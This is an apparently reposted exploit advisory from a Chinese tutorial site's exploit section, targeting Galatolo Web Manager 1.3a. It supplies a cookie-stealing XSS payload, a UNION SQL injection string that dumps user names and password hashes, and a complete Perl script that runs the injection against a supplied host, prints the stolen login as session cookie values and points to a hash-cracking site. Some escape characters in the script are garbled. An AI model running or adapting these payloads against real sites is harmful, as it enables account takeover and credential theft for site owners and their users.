手机
当前位置:查字典教程网 >网络安全 >Exploit >Galatolo Web Manager 1.3a
Galatolo Web Manager 1.3a
摘要:--====================================================================...

--== ============================================================================ ==--

--== Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability ==--

--== ============================================================================ ==--

[*] Discovered By: StAkeR ~ StAkeR@hotmail.it

[ ] Discovered On: 14 Jul 2008

[ ] Download: http://gwm.dev-area.org/view.php?id=8

[*] Vulnerabilities:

[*] XSS <= 1.3a

[ ] all.php?tag= [Code Javascript]

[ ] http://site.com/all.php?tag=<script>alert(document.cookie)</script>

[*] SQL (plugin users) 1.3a

[ ] plugins/users/index.php?id= [Code SQL]

[ ] -1 union select null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version()) from users where id=1--

[*] Exploit:

#!/usr/bin/perl

use strict;

use LWP::UserAgent;

my $host = shift;

my ($start,$content,@login);

my $evilxx = "/plugins/users/index.php?id=-1 union select 1,concat(0x25,user,0x25,pass),null,null from users where id=1--";

if($host =~ /^http://?/i)

{

$start = new LWP::UserAgent or die "[ ] Unable to connectn";

$start->timeout(1);

$start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");

$content = $start->get($host.$evilxx);

if($content->is_success)

{

if($content->content =~ /%(. ?)%([0-9a-f]{32})/)

{

push(@login,$1,$2);

print "[ ] Login:n";

print "[ ] Username: $login[0]n";

print "[ ] Password: $login[1]nn";

print "[ ] Cookie Session:n";

print "[ ] gwm_user = $login[0]n";

print "[ ] gwm_pass = $login[1]nn";

print "[ ] Crack Password:n";

print "[ ] md5(md5(password)) for crack:n";

print "[ ] http://passcracking.comn";

}

else

{

print "[ ] Exploit Failedn";

print "[ ] Site Not Vulnerablen";

}

}

}

else

{

print "[ ] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injectionn";

print "[ ] Exploit Coded By: StAkeR ~ StAkeR@hotmail.itnn";

print "[ ] Usage: Perl $0 <host>n";

print "[ ] Usage: Perl $0 http://site.comn";

}

【Galatolo Web Manager 1.3a】相关文章:

TGS CMS 0.3.2r2 Remote Code Execution Exploit

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

Maian Uploader

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

Maian Search

Dana IRC 1.4a Remote Buffer Overflow Exploit

精品推荐
分类导航